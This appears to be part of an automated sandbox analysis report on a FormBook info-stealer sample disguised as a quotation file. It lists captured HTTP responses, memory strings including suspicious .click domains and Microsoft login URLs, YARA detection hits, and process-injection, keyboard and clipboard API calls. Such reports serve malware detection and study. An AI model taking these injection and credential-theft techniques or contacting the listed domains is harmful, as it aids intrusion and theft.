                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 09:06:22 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 09:06:25 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 09:06:27 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 09:07:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rK8BUbrzb1SFW40gXkWsE2SjUE3Qf3e157hApvmONvKoMcgP9T%2FgdF%2BpyJe9NklnKusebH8fQRImm85ut3pRFgw76lL0yuz5auTJfSZ22FPbSS1iAwFhxBB4RKJmtbdWu7N7z2Wi2SBbLCwo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8edb2066480442d7-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1861&min_rtt=1861&rtt_var=930&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=881&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 09:07:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LmwbRBaAFWGVZYx9Q6BWA0PYMrYO97fBtKTafVdPpZAaLEaigdIk9LF71w%2FmHUDWm6Ok1W023j3wqb73dX3qD1On28h18CwTPeTItKwYX4IRkMHYl4eMTiaSMq7KKKME04Li3b71qsyLdOFm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8edb2076f9b0c333-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1506&rtt_var=753&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=905&delivery_rate=0&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0
                Source: FOBNeEFwBsF.exe, 0000000E.00000002.4010692987.0000000004F08000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.3kw40881107247y.click
                Source: FOBNeEFwBsF.exe, 0000000E.00000002.4010692987.0000000004F08000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.3kw40881107247y.click/yy0e/
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: comp.exe, 0000000D.00000002.4009464968.00000000045BA000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.00000000032FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: comp.exe, 0000000D.00000002.4009464968.00000000045BA000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.00000000032FA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: comp.exe, 0000000D.00000002.4007580490.0000000002F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: comp.exe, 0000000D.00000003.2772017876.0000000008186000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: comp.exe, 0000000D.00000002.4007580490.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: comp.exe, 0000000D.00000002.4007580490.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: comp.exe, 0000000D.00000002.4007580490.0000000002F7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: comp.exe, 0000000D.00000002.4007580490.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: comp.exe, 0000000D.00000002.4007580490.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: comp.exe, 0000000D.00000002.4009464968.000000000474C000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.000000000348C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=sunnyz.store
                Source: comp.exe, 0000000D.00000002.4009464968.0000000004296000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.0000000002FD6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: comp.exe, 0000000D.00000002.4011130087.0000000006760000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009464968.000000000474C000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.000000000348C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: comp.exe, 0000000D.00000002.4011130087.0000000006760000.00000004.00000800.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4009464968.0000000004A70000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.00000000037B0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: comp.exe, 0000000D.00000003.2777196017.00000000081AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: comp.exe, 0000000D.00000002.4009464968.00000000048DE000.00000004.10000000.00040000.00000000.sdmp, FOBNeEFwBsF.exe, 0000000E.00000002.4009205568.000000000361E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.muasamgiare.click/dc08/?KxZ=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00E74164
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E74164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00E74164
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E73F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00E73F66
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00E6001C
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E8CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E8CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.2640000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.2640000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.2589543027.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4007316653.0000000002E60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4008699192.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4010692987.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2590876860.0000000005120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4008790036.0000000003390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.4008647896.0000000002CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2590442326.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: This is a third-party compiled AutoIt script.0_2_00E03B3A
                Source: QUOTATON-37839993.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: QUOTATON-37839993.exe, 00000000.00000000.2134222857.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_806e8f3a-0
                Source: QUOTATON-37839993.exe, 00000000.00000000.2134222857.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_806adc5d-e
                Source: QUOTATON-37839993.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f49cce8e-c
                Source: QUOTATON-37839993.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_440c34cc-e
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0266C643 NtClose,4_2_0266C643
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026418C0 NtProtectVirtualMemory,4_2_026418C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0264191D NtProtectVirtualMemory,4_2_0264191D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026419C9 NtProtectVirtualMemory,4_2_026419C9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_026419A5 NtProtectVirtualMemory,4_2_026419A5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0264199A NtProtectVirtualMemory,4_2_0264199A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072B60 NtClose,LdrInitializeThunk,4_2_03072B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03072DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03072C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030735C0 NtCreateMutant,LdrInitializeThunk,4_2_030735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03074340 NtSetContextThread,4_2_03074340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03074650 NtSuspendThread,4_2_03074650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072B80 NtQueryInformationFile,4_2_03072B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072BA0 NtEnumerateValueKey,4_2_03072BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072BE0 NtQueryValueKey,4_2_03072BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072BF0 NtAllocateVirtualMemory,4_2_03072BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072AB0 NtWaitForSingleObject,4_2_03072AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072AD0 NtReadFile,4_2_03072AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072AF0 NtWriteFile,4_2_03072AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072F30 NtCreateSection,4_2_03072F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072F60 NtCreateProcessEx,4_2_03072F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072F90 NtProtectVirtualMemory,4_2_03072F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072FA0 NtQuerySection,4_2_03072FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072FB0 NtResumeThread,4_2_03072FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072FE0 NtCreateFile,4_2_03072FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072E30 NtWriteVirtualMemory,4_2_03072E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072E80 NtReadVirtualMemory,4_2_03072E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072EA0 NtAdjustPrivilegesToken,4_2_03072EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072EE0 NtQueueApcThread,4_2_03072EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072D00 NtSetInformationFile,4_2_03072D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072D10 NtMapViewOfSection,4_2_03072D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072D30 NtUnmapViewOfSection,4_2_03072D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072DB0 NtEnumerateKey,4_2_03072DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072DD0 NtDelayExecution,4_2_03072DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072C00 NtQueryInformationProcess,4_2_03072C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072C60 NtCreateKey,4_2_03072C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072CA0 NtQueryInformationToken,4_2_03072CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072CC0 NtQueryVirtualMemory,4_2_03072CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03072CF0 NtOpenProcess,4_2_03072CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03073010 NtOpenDirectoryObject,4_2_03073010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03073090 NtSetValueKey,4_2_03073090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030739B0 NtGetContextThread,4_2_030739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03073D10 NtOpenProcessToken,4_2_03073D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03073D70 NtOpenThread,4_2_03073D70
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03764340 NtSetContextThread,LdrInitializeThunk,13_2_03764340
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03764650 NtSuspendThread,LdrInitializeThunk,13_2_03764650
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03762B60 NtClose,LdrInitializeThunk,13_2_03762B60
